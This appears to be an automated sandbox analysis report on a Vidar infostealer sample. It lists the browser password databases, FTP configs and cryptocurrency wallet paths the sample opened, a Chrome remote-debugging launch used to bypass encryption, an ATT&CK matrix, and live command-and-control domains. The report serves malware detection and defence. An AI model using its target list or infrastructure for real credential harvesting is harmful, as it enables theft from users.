                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\pending_pings\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\saved-telemetry-pings\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\minidumps\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\crashes\events\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\default\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\glean\tmp\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\datareporting\archived\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.dbJump to behavior
                  Tries to harvest and steal ftp login credentials
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                  Tries to steal Crypto Currency Wallets
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                  Source: Yara matchFile source: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: gVKsiQIHqe.exe PID: 5564, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Attempt to bypass Chrome Application-Bound Encryption
                  Source: C:\Users\user\Desktop\gVKsiQIHqe.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                  Yara detected Vidar stealer
                  Source: Yara matchFile source: gVKsiQIHqe.exe, type: SAMPLE
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: 0.2.gVKsiQIHqe.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.0.gVKsiQIHqe.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: Process Memory Space: gVKsiQIHqe.exe PID: 5564, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
                  Native API                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		1
                  Deobfuscate/Decode Files or Information                  		2
                  OS Credential Dumping                  		2
                  System Time Discovery                  		Remote Services1
                  Archive Collected Data                  		2
                  Ingress Tool Transfer                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/Job1
                  Create Account                  		1
                  Extra Window Memory Injection                  		1
                  Obfuscated Files or Information                  		1
                  Credentials in Registry                  		1
                  Account Discovery                  		Remote Desktop Protocol4
                  Data from Local System                  		21
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAt1
                  Registry Run Keys / Startup Folder                  		11
                  Process Injection                  		1
                  DLL Side-Loading                  		Security Account Manager3
                  File and Directory Discovery                  		SMB/Windows Admin SharesData from Network Shared Drive1
                  Remote Access Software                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                  Registry Run Keys / Startup Folder                  		1
                  Extra Window Memory Injection                  		NTDS34
                  System Information Discovery                  		Distributed Component Object ModelInput Capture3
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Masquerading                  		LSA Secrets11
                  Query Registry                  		SSHKeylogging14
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                  Process Injection                  		Cached Domain Credentials111
                  Security Software Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync12
                  Process Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                  System Owner/User Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1579643 Sample: gVKsiQIHqe.exe Startdate: 23/12/2024 Architecture: WINDOWS Score: 100 43 toptek.sbs 2->43 45 t.me 2->45 47 chrome.cloudflare-dns.com 2->47 57 Suricata IDS alerts for network traffic 2->57 59 Found malware configuration 2->59 61 Multi AV Scanner detection for submitted file 2->61 63 7 other signatures 2->63 8 gVKsiQIHqe.exe 71 2->8         started        12 msedge.exe 641 2->12         started        signatures3 process4 dnsIp5 49 t.me 149.154.167.99, 443, 49704 TELEGRAMRU United Kingdom 8->49 51 toptek.sbs 94.130.188.57, 443, 49705, 49706 HETZNER-ASDE Germany 8->51 53 127.0.0.1 unknown unknown 8->53 65 Attempt to bypass Chrome Application-Bound Encryption 8->65 67 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 8->67 69 Found many strings related to Crypto-Wallets (likely being stolen) 8->69 71 5 other signatures 8->71 14 msedge.exe 2 10 8->14         started        17 chrome.exe 8 8->17         started        20 msedge.exe 12->20         started        22 msedge.exe 12->22         started        24 msedge.exe 12->24         started        26 msedge.exe 12->26         started        signatures6 process7 dnsIp8 73 Monitors registry run keys for changes 14->73 28 msedge.exe 14->28         started        33 192.168.2.5, 443, 49703, 49704 unknown unknown 17->33 35 239.255.255.250 unknown Reserved 17->35 30 chrome.exe 17->30         started        37 18.164.116.39, 443, 49897 MIT-GATEWAYSUS United States 20->37 39 sb.scorecardresearch.com 18.165.220.110, 443, 49841 MIT-GATEWAYSUS United States 20->39 41 17 other IPs or domains 20->41 signatures9 process10 dnsIp11 55 www.google.com 142.250.181.132, 443, 49713, 49714 GOOGLEUS United States 30->55

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  gVKsiQIHqe.exe71%ReversingLabsWin32.Trojan.Generic
                  gVKsiQIHqe.exe66%VirustotalBrowse
                  gVKsiQIHqe.exe100%Joe Sandbox ML

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  No Antivirus matches

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  chrome.cloudflare-dns.com
                  		172.64.41.3
                  		truefalse
                    		high
                    toptek.sbs
                    		94.130.188.57
                    		truefalse
                      		high
                      t.me
                      		149.154.167.99
                      		truefalse
                        		high
                        ssl.bingadsedgeextension-prod-europe.azurewebsites.net
                        		94.245.104.56
                        		truefalse
                          		high
                          sb.scorecardresearch.com
                          		18.165.220.110
                          		truefalse
                            		high
                            www.google.com
                            		142.250.181.132
                            		truefalse
                              		high
                              googlehosted.l.googleusercontent.com
                              		142.250.181.65
                              		truefalse
                                		high
                                clients2.googleusercontent.com
                                		unknown
                                		unknownfalse
                                  		high
                                  bzib.nelreports.net
                                  		unknown
                                  		unknownfalse
                                    		high
                                    assets.msn.com
                                    		unknown
                                    		unknownfalse
                                      		high
                                      c.msn.com
                                      		unknown
                                      		unknownfalse
                                        		high
                                        ntp.msn.com
                                        		unknown
                                        		unknownfalse
                                          		high
                                          api.msn.com
                                          		unknown
                                          		unknownfalse
                                            		high

                                            Contacted URLs

                                            NameMaliciousAntivirus DetectionReputation
                                            https://steamcommunity.com/profiles/76561199809363512false
                                              		high
                                              https://toptek.sbs/true
                                                		unknown
                                                https://t.me/k04aelfalse
                                                  		high
                                                  https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734933482034&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                                    		high
                                                    https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0false
                                                      		high
                                                      https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734933488576&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                                        		high
                                                        https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734933487734&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                                          		high
                                                          https://c.msn.com/c.gif?rnd=1734933482036&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=0e7012095d61412c88f16ab8ae837c65&activityId=0e7012095d61412c88f16ab8ae837c65&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=63FAA190F2474AB080F91B05DE1E2DE2&MUID=1527A764E6A86BDB2DE6B23AE7AF6A4Bfalse
                                                            		high
                                                            https://sb.scorecardresearch.com/b?rn=1734933482036&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=1527A764E6A86BDB2DE6B23AE7AF6A4B&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*nullfalse
                                                              		high
                                                              https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734933487728&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                                                		high
                                                                https://clients2.googleusercontent.com/crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crxfalse
                                                                  		high
                                                                  https://sb.scorecardresearch.com/b2?rn=1734933482036&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=1527A764E6A86BDB2DE6B23AE7AF6A4B&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*nullfalse
                                                                    		high

                                                                    URLs from Memory and Binaries

                                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                                    https://duckduckgo.com/chrome_newtabgVKsiQIHqe.exe, 00000000.00000002.3280611239.0000000003B2E000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000002.3279528745.000000000389E000.00000004.00000020.00020000.00000000.sdmp, GV3W4E.0.dr, 4W4EKN.0.dr, Web Data.8.drfalse
                                                                      		high
                                                                      https://toptek.sbs/PVgVKsiQIHqe.exe, 00000000.00000003.2113133100.00000000008B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://c.msn.com/2cc80dabc69f58b6_1.8.drfalse
                                                                          		high
                                                                          https://duckduckgo.com/ac/?q=gVKsiQIHqe.exe, 00000000.00000002.3280611239.0000000003B2E000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000002.3279528745.000000000389E000.00000004.00000020.00020000.00000000.sdmp, GV3W4E.0.dr, 4W4EKN.0.dr, Web Data.8.drfalse
                                                                            		high
                                                                            https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshoreline22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drfalse
                                                                              		high
                                                                              https://ntp.msn.com/0000003.log0.8.drfalse
                                                                                		high
                                                                                https://ntp.msn.com/_defaultQuotaManager.8.drfalse
                                                                                  		high
                                                                                  https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.gVKsiQIHqe.exe, 00000000.00000002.3279528745.0000000003861000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000002.3282727339.0000000003D2B000.00000004.00000020.00020000.00000000.sdmp, P8QIEK.0.drfalse
                                                                                    		high
                                                                                    https://www.last.fm/22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drfalse
                                                                                      		high
                                                                                      https://deff.nelreports.net/api/report?cat=msn2cc80dabc69f58b6_0.8.drfalse
                                                                                        		high
                                                                                        https://ntp.msn.cn/edge/ntp2cc80dabc69f58b6_1.8.drfalse
                                                                                          		high
                                                                                          https://toptek.sbsgVKsiQIHqe.exe, 00000000.00000002.3277818216.0000000000881000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2159778858.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2136596428.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2113133100.00000000008B4000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmp, gVKsiQIHqe.exe, 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                                            		unknown
                                                                                            https://sb.scorecardresearch.com/2cc80dabc69f58b6_1.8.drfalse
                                                                                              		high
                                                                                              https://deff.nelreports.net/api/reportReporting and NEL.9.drfalse
                                                                                                		high
                                                                                                https://docs.google.com/manifest.json0.8.drfalse
                                                                                                  		high
                                                                                                  https://www.youtube.com22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drfalse
                                                                                                    		high
                                                                                                    https://deff.nelreports.net/api/report?cat=msnwReporting and NEL.9.drfalse
                                                                                                      		high
                                                                                                      https://www.instagram.com22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drfalse
                                                                                                        		high
                                                                                                        https://web.skype.com/?browsername=edge_canary_shoreline22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drfalse
                                                                                                          		high
                                                                                                          https://drive.google.com/manifest.json0.8.drfalse
                                                                                                            		high
                                                                                                            https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=122db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drfalse
                                                                                                              		high
                                                                                                              https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=222db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drfalse
                                                                                                                		high
                                                                                                                https://www.messenger.com22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drfalse
                                                                                                                  		high
                                                                                                                  https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drfalse
                                                                                                                    		high
                                                                                                                    https://outlook.office.com/mail/compose?isExtension=true22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drfalse
                                                                                                                      		high
                                                                                                                      https://toptek.sbs/PGgVKsiQIHqe.exe, 00000000.00000003.2182794313.00000000008AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        https://unitedstates4.ss.wd.microsoft.us/edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.8.drfalse
                                                                                                                          		high
                                                                                                                          https://i.y.qq.com/n2/m/index.html22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drfalse
                                                                                                                            		high
                                                                                                                            https://www.deezer.com/22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drfalse
                                                                                                                              		high
                                                                                                                              https://web.telegram.org/22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drfalse
                                                                                                                                		high
                                                                                                                                https://cdnjs.cloudflare.com/ajax/libs/mathjax/offscreendocument_main.js.8.dr, service_worker_bin_prod.js.8.drfalse
                                                                                                                                  		high
                                                                                                                                  https://drive-daily-2.corp.google.com/manifest.json0.8.drfalse
                                                                                                                                    		high
                                                                                                                                    https://drive-daily-4.corp.google.com/manifest.json0.8.drfalse
                                                                                                                                      		high
                                                                                                                                      https://vibe.naver.com/today22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drfalse
                                                                                                                                        		high
                                                                                                                                        https://srtb.msn.com/2cc80dabc69f58b6_1.8.drfalse
                                                                                                                                          		high
                                                                                                                                          https://unitedstates1.ss.wd.microsoft.us/edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.8.drfalse
                                                                                                                                            		high
                                                                                                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=gVKsiQIHqe.exe, 00000000.00000002.3280611239.0000000003B2E000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000002.3279528745.000000000389E000.00000004.00000020.00020000.00000000.sdmp, GV3W4E.0.dr, 4W4EKN.0.dr, Web Data.8.drfalse
                                                                                                                                              		high
                                                                                                                                              https://t.me/k04aelm0nk3Mozilla/5.0gVKsiQIHqe.exefalse
                                                                                                                                                		high
                                                                                                                                                https://toptek.sbs/.GgVKsiQIHqe.exe, 00000000.00000003.2182794313.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2159778858.00000000008AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		unknown
                                                                                                                                                  https://www.ecosia.org/newtab/gVKsiQIHqe.exe, 00000000.00000002.3279528745.000000000389E000.00000004.00000020.00020000.00000000.sdmp, 4W4EKN.0.drfalse
                                                                                                                                                    		high
                                                                                                                                                    https://drive-daily-1.corp.google.com/manifest.json0.8.drfalse
                                                                                                                                                      		high
                                                                                                                                                      https://excel.new?from=EdgeM365Shoreline22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drfalse
                                                                                                                                                        		high
                                                                                                                                                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brgVKsiQIHqe.exe, 00000000.00000002.3283527517.0000000003FDF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://drive-daily-5.corp.google.com/manifest.json0.8.drfalse
                                                                                                                                                            		high
                                                                                                                                                            https://toptek.sbs/$GgVKsiQIHqe.exe, 00000000.00000003.2159778858.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2136596428.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2113133100.00000000008B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		unknown
                                                                                                                                                              https://bzib.nelreports.net/api/report?cat=bingbusinessReporting and NEL.9.drfalse
                                                                                                                                                                		high
                                                                                                                                                                https://www.google.com/chromecontent_new.js.8.dr, content.js.8.drfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://www.tiktok.com/22db65d9-25fa-42c2-9880-193c2562df6d.tmp.8.drfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://www.msn.com/web-notification-icon-light.png2cc80dabc69f58b6_1.8.drfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://steamcommunity.com/profiles/76561199809363512m0nk3Mozilla/5.0gVKsiQIHqe.exefalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&refgVKsiQIHqe.exe, 00000000.00000002.3279528745.0000000003861000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000002.3282727339.0000000003D2B000.00000004.00000020.00020000.00000000.sdmp, P8QIEK.0.drfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://chromewebstore.google.com/manifest.json.8.drfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://toptek.sbsLgVKsiQIHqe.exe, 00000000.00000003.2182794313.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2159778858.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2136596428.00000000008AD000.00000004.00000020.00020000.00000000.sdmp, gVKsiQIHqe.exe, 00000000.00000003.2113133100.00000000008B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		unknown
                                                                                                                                                                              https://drive-preprod.corp.google.com/manifest.json0.8.drfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://srtb.msn.cn/2cc80dabc69f58b6_1.8.drfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://toptek.sbsDatagVKsiQIHqe.exe, 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                                    		unknown
